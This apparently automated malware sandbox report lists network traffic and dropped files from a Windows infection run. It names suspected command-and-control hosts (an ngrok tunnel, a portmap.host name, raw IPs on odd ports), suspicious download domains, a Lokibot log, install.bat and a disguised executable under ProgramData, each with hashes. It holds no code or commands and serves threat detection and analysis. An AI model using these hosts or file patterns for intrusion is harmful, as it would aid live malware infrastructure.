US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 us-u.openx.net udp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 8.8.8.8:53 trc.taboola.com udp
US 151.101.193.44:443 trc.taboola.com tcp
US 35.244.159.8:443 us-u.openx.net tcp
IE 52.213.68.253:443 sync.crwdcntrl.net tcp
US 8.8.8.8:53 tpc.googlesyndication.com udp
FR 216.58.214.161:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 44.193.101.151.in-addr.arpa udp
US 8.8.8.8:53 8.159.244.35.in-addr.arpa udp
US 8.8.8.8:53 253.68.213.52.in-addr.arpa udp
US 35.71.131.137:443 match.adsrvr.org tcp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.164:443 www.google.com udp
US 8.8.8.8:53 137.131.71.35.in-addr.arpa udp
FR 142.250.179.98:443 ep1.adtrafficquality.google udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.12.245.36:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 downloads.sourceforge.net udp
US 8.8.8.8:53 altushost-swe.dl.sourceforge.net udp
SE 79.142.76.130:443 altushost-swe.dl.sourceforge.net tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 8.8.8.8:53 130.76.142.79.in-addr.arpa udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.12.245.36:19521 0.tcp.ngrok.io tcp
NL 178.250.1.3:443 static.criteo.net tcp
US 172.67.134.120:443 bt.dns-finder.com tcp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 8.8.8.8:53 a10e6fedb7d54fee8ad77ab8889190f1.safeframe.googlesyndication.com udp
US 8.8.8.8:53 loadus.exelator.com udp
IE 34.254.143.3:443 loadus.exelator.com tcp
US 8.8.8.8:53 3.143.254.34.in-addr.arpa udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 168.61.222.215:5400 tcp
FR 185.136.161.124:6128 tcp
FR 185.136.161.124:6128 tcp
US 3.12.245.36:19521 0.tcp.ngrok.io tcp
FR 185.136.161.124:11614 tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.12.245.36:19521 0.tcp.ngrok.io tcp
FR 185.136.161.124:11614 tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
NL 178.250.1.3:443 static.criteo.net tcp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
US 8.8.8.8:53 64a2eacc557d2430a7c0e83e10efb00d.safeframe.googlesyndication.com udp
US 3.12.245.36:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 blesblochem.com udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 34.227.7.138:80 blesblochem.com tcp
US 34.227.7.138:80 blesblochem.com tcp
US 8.8.8.8:53 138.7.227.34.in-addr.arpa udp
US 3.12.245.36:19521 0.tcp.ngrok.io tcp
US 34.227.7.138:80 blesblochem.com tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.12.245.36:19521 0.tcp.ngrok.io tcp
US 168.61.222.215:5400 tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
FR 185.136.161.124:8761 tcp
FR 185.136.161.124:8761 tcp
FR 185.136.161.124:15822 tcp
US 8.8.8.8:53 0.tcp.ngrok.io udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
FR 185.136.161.124:15822 tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 168.61.222.215:5400 tcp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 8.8.8.8:53 8.179.89.13.in-addr.arpa udp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
FR 185.136.161.124:11614 tcp
FR 185.136.161.124:11614 tcp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
FR 185.136.161.124:17443 tcp
US 168.61.222.215:5400 tcp
US 8.8.8.8:53 igk.filexspace.com udp
US 104.21.16.1:443 igk.filexspace.com tcp
US 104.21.16.1:443 igk.filexspace.com tcp
US 8.8.8.8:53 1.16.21.104.in-addr.arpa udp
US 8.8.8.8:53 refomin-glosary.online udp
US 172.67.213.189:443 refomin-glosary.online tcp
US 172.67.213.189:443 refomin-glosary.online tcp
US 8.8.8.8:53 qiwixfile.live udp
US 172.67.177.65:443 qiwixfile.live tcp
US 34.227.7.138:80 blesblochem.com tcp
US 8.8.8.8:53 189.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 65.177.67.172.in-addr.arpa udp
US 8.8.8.8:53 javascriptcontentgroup.com udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 104.26.3.199:443 javascriptcontentgroup.com tcp
US 104.17.25.14:443 cdnjs.cloudflare.com tcp
US 8.8.8.8:53 199.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 14.25.17.104.in-addr.arpa udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
FR 185.136.161.124:17443 tcp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp
US 8.8.8.8:53 www.7-zip.org udp
DE 49.12.202.237:443 www.7-zip.org tcp
DE 49.12.202.237:443 www.7-zip.org tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 237.202.12.49.in-addr.arpa udp
US 8.8.8.8:53 startitit2-23969.portmap.host udp
US 3.137.60.53:19521 0.tcp.ngrok.io tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d22073dea53e79d9b824f27ac5e9813e
SHA1 6d8a7281241248431a1571e6ddc55798b01fa961
SHA256 86713962c3bb287964678b148ee08ea83fb83483dff8be91c8a6085ca560b2a6
SHA512 97152091ee24b6e713b8ec8123cb62511f8a7e8a6c6c3f2f6727d0a60497be28814613b476009b853575d4931e5df950e28a41afbf6707cb672206f1219c4413

\??\pipe\LOCAL\crashpad_2948_WVUESCXCVPBEIBTN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bffcefacce25cd03f3d5c9446ddb903d
SHA1 8923f84aa86db316d2f5c122fe3874bbe26f3bab
SHA256 23e7cbbf64c81122c3cb30a0933c10a320e254447771737a326ce37a0694d405
SHA512 761dae5315b35ec0b2fe68019881397f5d2eadba3963aba79a89f8953a0cd705012d7faf3a204a5f36008926b9f614980e333351596b06ce7058d744345ce2e7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 879cdea6fbb95e4dd1927b010798a02b
SHA1 534f4b02db1cee782ddf49f92f19f1b07256785f
SHA256 a020d61ad67b9d4a65fed5f62644eb3011d2f8d203829c8de1271823b72e8233
SHA512 71746b8c8804e88d04d6eab54dfc6c9efd1b98754a3cdac841b5f6c1d6d361f3e8f51fa8354dae59987bfb7f9501a4673949e803b24711770df6ebd0d6097766

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ef8f1825a5701bb2805767846a18ade2
SHA1 3e7c03803a5c52cae6b13d785fafa56cf96aadb7
SHA256 699bd57505753c6936a0a23e68442a6fadf3877764ac099a5efc4ad1e68d582f
SHA512 1519ccfe5a385820b94a6393b2b1945769347ece8ae2fa583d1701a14427ea20ef4404fb9be018652d82b9d263051ee728e5e8e7c4a108e03f6eaeaffed97d65

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 047bb761b0014c95e8f187ced963418c
SHA1 6a9bab57778d44f51da81f7c94793165d107ba32
SHA256 51cf226ca552301da723c0b76beb620f18e64b0836dce0f0b1331561ae50c557
SHA512 e13dd21a86c7bae12284b546d6873aec721b03cc432fb9e5c85f591f71fe774eaba961c87179052a9ae9dce8971ca07beedee7c4b578055a3b2e3be67a9a4bdc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

MD5 bcfda9afc202574572f0247968812014
SHA1 80f8af2d5d2f978a3969a56256aace20e893fb3f
SHA256 7c970cd163690addf4a69faf5aea65e7f083ca549f75a66d04a73cb793a00f91
SHA512 508ca6011abb2ec4345c3b80bd89979151fee0a0de851f69b7aa06e69c89f6d8c3b6144f2f4715112c896c5b8a3e3e9cd49b05c9b507602d7f0d6b10061b17bd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 f6b7225b622c379228e4888b4b7c0ee6
SHA1 5fd94a4a209983ec4ca0420b99fd2c9f323e5c00
SHA256 74ced6a73822c8e4b42fba0530b306616eef3ff48d168fd2799ab820b6eae20d
SHA512 807ede61f7ea7f3dc7070f6f51004d70eb029552dd1fc8e1b00ed7c2de219358108b49c552a2626c6e58a5d706dc126afe53e877b627366a699e075803e686c2

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e9207791049a09073558c9f1fe1e66fc
SHA1 6ef379be2c8d228cfaa52e078ad78f2e3e3d12c7
SHA256 1ef9227cce56687c5f89fb56fcdbe79417c8682b83897edf8a181eada9fbaa7f
SHA512 81e4809b4847b262e4599555cb8d83b49c09b7e559ba826ddfe1383b0f8a5b00eeebeb8b20f7d37b26a2b6eec4cbf16001d2c56e96ebff4534a51548ed401180

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5818c3.TMP

MD5 dd72615e68c3bde544fbc402aa5d348c
SHA1 2dd13fec05a2cca2690e845257ee366f0d53f0c9
SHA256 3293fa4359105e19b0830f2c1c0a386e987bdee599079545a5ec09363f0b92f9
SHA512 6908e17d38b0780c93d0863510b4600b4818d64227b8c530a4fca8ef15deab8825aae2f213ef6707b219aec1e2d163ad61d484605dce49ebfb75d7e92e3cd05e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 711bf7a71024f4e9acb983cd489fd855
SHA1 56f4fc20329344f0631c5d32f56fb48f07b57748
SHA256 ed135119093fcaf6f05b14e72f8fe7aadb98d370479d409633f612652127b9cb
SHA512 2c8b6d32f53099b20c51340ed982b17af08cf0a736b01894790866e9ea06490753d22b00de9c5068b47af5147a2b327f710b338199ed9dbffddf5b711abfcaad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 286ac946daaaa10bd8ce66923786eb29
SHA1 563f77381b2058e07128f8d2421155155c1d888f
SHA256 9301d51d79e3610878d45e4b28f5b5a0b449887ae4ffca99d07237c0a6260a40
SHA512 560110874d095448c32d4d082fea53b91444b7a5c0699930a90e3a80c7f7bbb9cab1dd574ff57f56947a3c4b970b7cd43a23353ac88eaa3651579cee4c12cf7c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 24884cc42860005b4b95eb3b657f1340
SHA1 47301e632afeae46e437d6fa3a946a89665d09e5
SHA256 730753170fab76afa66131b0090db680626cde28c127a2cb0607d0a416fc0822
SHA512 924768e6b0382b469d95e30f1c45034204713548bff0d51c78b34856224336d64a56164a4784d7ce813c09a3a0e22c6524085d78f8012a793fed27228926fc00

C:\Users\Admin\Downloads\Unconfirmed 44579.crdownload

MD5 fe537a3346590c04d81d357e3c4be6e8
SHA1 b1285f1d8618292e17e490857d1bdf0a79104837
SHA256 bbc572cced7c94d63a7208f4aba4ed20d1350bef153b099035a86c95c8d96d4a
SHA512 50a5c1ad99ee9f3a540cb30e87ebfdf7561f0a0ee35b3d06c394fa2bad06ca6088a04848ddcb25f449b3c98b89a91d1ba5859f1ed6737119b606968be250c8ce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6f957ccf8dbbdc880e318c640a6c0a72
SHA1 19b376fd6f626106a092bf97517b1054a8f2189d
SHA256 3dfa1b7dbe73e88b00458925d606da1bf07887f3993c4304757e86d4d3710c6f
SHA512 71c53209f02d8f580c9d805dd0101adef15de49945b4cab3a7a1b142cd83ad09d77700c6e121f985a92522f3c8e25812976b042f8a77db0c714a25ea708422e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 d508e23b83cbb95087281a3a7088fc04
SHA1 def79c28871e2a43a86e820d304a615540b84b94
SHA256 56fd0d0776051c7fd71f0bd5e94af81dcbc07454305c9d5bcf83ccd6240f2629
SHA512 34b39d2d6079ce9e83d2f4601f12b7752d568b84168e7266d926081b9aede973b14d0b5e7a30655217c315723c9c47ad9986c98c15d30c44ef59f498b14af7cd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 392c2580127e6e9f751e79a49868d0b8
SHA1 398d01feeea9ee064b6512c7c32df802247c5c12
SHA256 70da95aab8f078c3d1596f5b5dd900bd8dd3c7067450591d311f3a54eb34d1c7
SHA512 d5f83a779004c59e4064d0c3d92cb5a84779ccc2c8cf2d9f7777c9a9f74b723e366ae4342d5aa2644826a7b2dfaad35db3b00a5f763d3e30d8e69655cf96a11b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 b146c9f9805e2cfb0818fc3d00faa424
SHA1 d6cfa50210cb32004ee1acbc307f6c81d31412f5
SHA256 37b4d3c24018e79c1d81b3dc110bc75dbe352c617aba1f48ef2dfe0728498d4d
SHA512 9227662f5994597794681d029e707c9ec7ad889e5c590ef2ee4ef749b37bd55b7332c65dea6f17640ac9c7292cf8ac0ce84f835fa68f0fe5e589fa01442e9c62

C:\Users\Admin\Downloads\Unconfirmed 389843.crdownload

MD5 b6e148ee1a2a3b460dd2a0adbf1dd39c
SHA1 ec0efbe8fd2fa5300164e9e4eded0d40da549c60
SHA256 dc31e710277eac1b125de6f4626765a2684d992147691a33964e368e5f269cba
SHA512 4b8c62ddfc7cd3e5ce1f8b5a1ba4a611ab1bfccf81d80cf2cfc831cffa1d7a4b6da0494616a53b419168bc3a324b57382d4a6186af083de6fc93d144c4503741

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 9d87633806b7d71f10b9a013cacbab4d
SHA1 569e9995c4fe7b8e1db8bb601167c4248f9e25a3
SHA256 e03a6277f16db87d650f3135475e22dad72ca351aec6edeae08f18686e822ad9
SHA512 cf64e15e237ea85ad289f4d83c0634b15a6369ec67070921f7d16ab25da10f306bad3075aaa06af74604518628611a6e2b761f972bbd0dd5dceef6d34d7b5ecd

C:\Users\Admin\Downloads\Unconfirmed 707347.crdownload

MD5 29a37b6532a7acefa7580b826f23f6dd
SHA1 a0f4f3a1c5e159b6e2dadaa6615c5e4eb762479f
SHA256 7a84dd83f4f00cf0723b76a6a56587bdce6d57bd8024cc9c55565a442806cf69
SHA512 a54e2b097ffdaa51d49339bd7d15d6e8770b02603e3c864a13e5945322e28eb2eebc32680c6ddddbad1d9a3001aa02e944b6cef86d4a260db7e4b50f67ac9818

C:\Users\Admin\Downloads\Unconfirmed 230875.crdownload

MD5 600e0dbaefc03f7bf50abb0def3fb465
SHA1 1b5f0ac48e06edc4ed8243be61d71077f770f2b4
SHA256 61e6a93f43049712b5f2d949fd233fa8015fe4bef01b9e1285d3d87b12f894f2
SHA512 151eebac8f8f6e72d130114f030f048dff5bce0f99ff8d3a22e8fed7616155b3e87d29acf79f488d6b53ed2c5c9b05b57f76f1f91a568c21fe9bca228efb23d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 d53510abe412634b9840111434e066e3
SHA1 2607f5cde28efe46dd2b3e5e47289a16e1532bd3
SHA256 b78c70e669f2c35539bd09b86cfc2ec7587cd1e764de9bc5d921d5ce40273ea7
SHA512 d4b94787bcdb5b59ae42daa350971b0f4f6ce521fb5bc0f2763c485cd18ae4ca091da505032d3bfcd1c8251c692ccae9a618212e3617382e077000c2916de0e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 3f8e66baec153e5c7a157e9bc470bd6c
SHA1 f81ea78fbb1131b0cdbf3faee5110a8442c9aa33
SHA256 d18c99fe84cdf415a759969dfd09df1cd5b5bee3f7d084f62d5f2d53e1e55328
SHA512 9da2566a4e2525c279c952832f176284f91fd1ea590c1308d9eff2053e8514425fca1fce7cea5638f6cc84d7242d64bbe91afca4d5f6ba52d494c2488a247c3c

C:\Users\Admin\Downloads\Unconfirmed 185813.crdownload

MD5 fb598b93c04baafe98683dc210e779c9
SHA1 c7ccd43a721a508b807c9bf6d774344df58e752f
SHA256 c851749fd6c9fa19293d8ee2c5b45b3dc8561115ddfe7166fbaefcb9b353b7c4
SHA512 1185ffe7e296eaaae50b7bd63baa6ffb8f5e76d4a897cb3800cead507a67c4e5075e677abdbf9831f3f81d01bdf1c06675a7c21985ef20a4bae5a256fd41cc0f

C:\Users\Admin\Downloads\Unconfirmed 242210.crdownload

MD5 1d9045870dbd31e2e399a4e8ecd9302f
SHA1 7857c1ebfd1b37756d106027ed03121d8e7887cf
SHA256 9b4826b8876ca2f1378b1dfe47b0c0d6e972bf9f0b3a36e299b26fbc86283885
SHA512 9419ed0a1c5e43f48a3534e36be9b2b03738e017c327e13586601381a8342c4c9b09aa9b89f80414d0d458284d2d17f48d27934a6b2d6d49450d045f49c10909

C:\Users\Admin\Downloads\Unconfirmed 185813.crdownload:SmartScreen

MD5 4047530ecbc0170039e76fe1657bdb01
SHA1 32db7d5e662ebccdd1d71de285f907e3a1c68ac5
SHA256 82254025d1b98d60044d3aeb7c56eed7c61c07c3e30534d6e05dab9d6c326750
SHA512 8f002af3f4ed2b3dfb4ed8273318d160152da50ee4842c9f5d9915f50a3e643952494699c4258e6af993dc6e1695d0dc3db6d23f4d93c26b0bc6a20f4b4f336e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 560acfde63cd4e04372397123dc4cc2e
SHA1 bb31359b94b0ca6a9cdecae86c86210857963ba8
SHA256 bc7e427fecb4c36a2dbe46d1066ac932d779e4a00b0906da798023f5505bafa7
SHA512 fde36ad51547ec4df2c917a585a49484eafb67e2dc5fcff67a137a62feaf9040a094df8967ef1e0a8b11e59b91b1f2b33a2dfed8b7b5293e1d7cf23b204031d8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 8fee3170a46f149305848f2e83a7c2ca
SHA1 17e1040e1d7e7bebd3144ddc6169d5825bbc3f8f
SHA256 fe1a8efb1635f39c53eafa90c69b78c100f72bcd00b7137f3ada3e35f6627f12
SHA512 b8ff8ff698be3f5d10d6ed097714108ec1a61d1fa48d5e45bb6d1b087ebdec443b7817c1f0854a2f718174d7617609f7402abe3e94a3fb00ea435117786501a1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000039

MD5 f52fbb02ac0666cae74fc389b1844e98
SHA1 f7721d590770e2076e64f148a4ba1241404996b8
SHA256 a885b1f5377c2a1cead4e2d7261fab6199f83610ffdd35d20c653d52279d4683
SHA512 78b4bf4d048bda5e4e109d4dd9dafaa250eac1c5a3558c2faecf88ef0ee5dd4f2c82a791756e2f5aa42f7890efcc0c420156308689a27e0ad9fb90156b8dc1c0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 aa6f3e73d9c25512c750a02d687a9ffd
SHA1 adfc2603dd5fb7443496620a67073184d322c597
SHA256 6cfc237221cc72527d0f6bcdf63d4862a9cb7b334069d138fc7b3e31ad39ab4d
SHA512 a123511676f231a80354ad9f5e7acff313fa3b5c967c33bcf536b03002328db6cb15d15c943967297191f28ebbc211a95212b86cd42ff6c0d758727b745a6510

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 ec75ef2fda2864ac81e2f89b61248826
SHA1 3261379bab177b4bb51b61fad7cead5143de5bc9
SHA256 cde1239a9217c7962b2cecf6fd02dc3f84c0fd4cec89dd084c60442f90a1633a
SHA512 613c6bf23a8d7462c0563c7e38d51997708deb12133e5e6c1cb9e65aab679efa099a21d48301756abcc1c86b6eed5783f43788a106bea27a47e41ae62355d2ab

memory/5964-785-0x0000000000C20000-0x0000000000C72000-memory.dmp

memory/5536-786-0x0000000002540000-0x0000000002554000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Lokibot.exe.log

MD5 4eaca4566b22b01cd3bc115b9b0b2196
SHA1 e743e0792c19f71740416e7b3c061d9f1336bf94
SHA256 34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb
SHA512 bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

memory/4700-799-0x000000001C350000-0x000000001C81E000-memory.dmp

memory/5248-800-0x000000001B9A0000-0x000000001BA46000-memory.dmp

memory/5248-801-0x000000001C4F0000-0x000000001C552000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\uRClgZblR.txt

MD5 502984a8e7a0925ac8f79ef407382140
SHA1 0e047aa443d2101eb33ac4742720cb528d9d9dba
SHA256 d25b36f2f4f5ec765a39b82f9084a9bde7eb53ac12a001e7f02df9397b83446c
SHA512 6c721b4ae08538c7ec29979da81bc433c59d6d781e0ce68174e2d0ca1abf4dbc1c353510ce65639697380ccd637b9315662d1f686fea634b7e52621590bfef17

memory/4572-806-0x0000000000400000-0x0000000000420000-memory.dmp

memory/3044-807-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegSvcs.exe.log

MD5 944402545afccaaf768f62367ad5d842
SHA1 d1598ec9409d0d59f52f9bf0da6390bb5d5b6559
SHA256 4fc9414bd5572166acdf31288625df1f0bd34f5d0ba8888bca181258d81c85ac
SHA512 9ec3875fb0e84301992f902ef3f85c53417d759f8e9e7064a0316a556043d428ffb90f91b54fe2761fae7ce9b73ed5d536dcc51b9a696965e6c4b209ec01711c

memory/5124-827-0x0000000000400000-0x0000000000417000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\install.bat

MD5 90022f82afe48963cc42547209f18f96
SHA1 e60698c77e7df4cccc493f2cfa6d76f7553d71e2
SHA256 046509f2b672f0f5da1b5441649873c736d81853701b67094bb319b025afb2cc
SHA512 6743f17da515c61ba1ab3df53077929d6f480f84978bcf8ae61880015221f245fde6e3a2ffe3dc937f80b37e8774dcc61838ee4ed461658b3a44f02cc0469208

memory/1612-842-0x0000000000010000-0x0000000000066000-memory.dmp

memory/1612-844-0x0000000005170000-0x0000000005714000-memory.dmp

memory/1612-845-0x0000000004CC0000-0x0000000004D52000-memory.dmp

memory/1612-846-0x0000000004CA0000-0x0000000004CA8000-memory.dmp

memory/1612-852-0x0000000004E40000-0x0000000004E68000-memory.dmp

memory/1612-851-0x0000000005720000-0x00000000057BC000-memory.dmp

memory/5560-858-0x0000000000400000-0x0000000000553000-memory.dmp

memory/5560-859-0x0000000000400000-0x0000000000553000-memory.dmp

memory/5896-875-0x000001D0864C0000-0x000001D0864DE000-memory.dmp

C:\ProgramData\Hdlharas\mdkhm.zip

MD5 b635f6f767e485c7e17833411d567712
SHA1 5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8
SHA256 6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e
SHA512 551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

C:\ProgramData\Hdlharas\dlrarhsiva.exe

MD5 64261d5f3b07671f15b7f10f2f78da3f
SHA1 d4f978177394024bb4d0e5b6b972a5f72f830181
SHA256 87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad
SHA512 3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

memory/5552-903-0x00000278DCC10000-0x00000278DD524000-memory.dmp

C:\ProgramData\svchost\vcredist2012_x86_0_vcRuntimeMinimum_x86.ico

MD5 fde1b01ca49aa70922404cdfcf32a643
SHA1 b0a2002c39a37a0ccaf219d42f1075471fd8b481
SHA256 741fe085e34db44b7c8ae83288697fab1359b028411c45dab2a3ca8b9ea548a5
SHA512 b6b4af427069602e929c1a6ce9d88c4634f0927b7292efb4070d15fb40ce39fc5ce868452dcd5642b2864730502de7a4c33679c936beb1a86c26a753d3f4dc25

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 904d294033531b56a5f054fc9df9339b
SHA1 f9752a300db1aae1b4570c403fd2248acf3e3b33
SHA256 c842f53ca7b14cc7b38bf025ea8214986f5bfec6e6350cf24676794bccc7e846
SHA512 58e968f769008bca31ae1aef01c0ef97f41022d42c8fd8f3643abe01f7d7f42006280f229c492a2d8fa6b7ea154d4686b553df53c46a4a4c9d358a865ba28754

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 c3874ad8f2023da2ae9603527a375be1
SHA1 cdfaa66f5211949875216b9c7f40eaf4fe78b727
SHA256 b04abfcd5ba3a031754e07ec367e5789900975ce9b9fc1216419d7be9c69961e
SHA512 6787e3d7c3f49f11532f08021370ab900736d8856f3bbb356eae67be583a65e17d38ce74fa7df8f078e657084848b0f07882022af4cac78970c47e596341076c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

MD5 c813a1b87f1651d642cdcad5fca7a7d8
SHA1 0e6628997674a7dfbeb321b59a6e829d0c2f4478
SHA256 df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3
SHA512 af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

MD5 69df804d05f8b29a88278b7d582dd279
SHA1 d9560905612cf656d5dd0e741172fb4cd9c60688
SHA256 b885987a52236f56ce7a5ca18b18533e64f62ab64eb14050ede93c93b5bd5608
SHA512 0ef49eeeeb463da832f7d5b11f6418baa65963de62c00e71d847183e0035be03e63c097103d30329582fe806d246e3c0e3ecab8b2498799abbb21d8b7febdc0e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

MD5 1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5
SHA1 6dd8803e59949c985d6a9df2f26c833041a5178c
SHA256 af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725
SHA512 b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

MD5 56d57bc655526551f217536f19195495
SHA1 28b430886d1220855a805d78dc5d6414aeee6995
SHA256 f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4
SHA512 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 3a9a538b084e3d160cbef2264d94930d
SHA1 06f805fa4350ea57b936816d03b6ca07cf918e0f
SHA256 fbb93975c947093d4007d902b58ac314b3c0c92817553ee77bf3f2e28fcabd84
SHA512 b82978baa0061465fa4b91cd5d3cc181c0e281bd6640ca2dc375be76948573988ae0259b8e27df0318ba8480c00b2d8a84a48eaa0afea6e97b83a4ddaa1025b8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027

MD5 7d54dd3fa3c51a1609e97e814ed449a0
SHA1 860bdd97dcd771d4ce96662a85c9328f95b17639
SHA256 7a258cd27f674e03eafc4f11af7076fb327d0202ce7a0a0e95a01fb33c989247
SHA512 17791e03584e77f2a6a03a7e3951bdc3220cd4c723a1f3be5d9b8196c5746a342a85226fcd0dd60031d3c3001c6bdfee0dcc21d7921ea2912225054d7f75c896

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 397be3fbb9ec8de0f7046c0e823c11be
SHA1 46bd0762406affb55c8e65ec3da485b386caf363
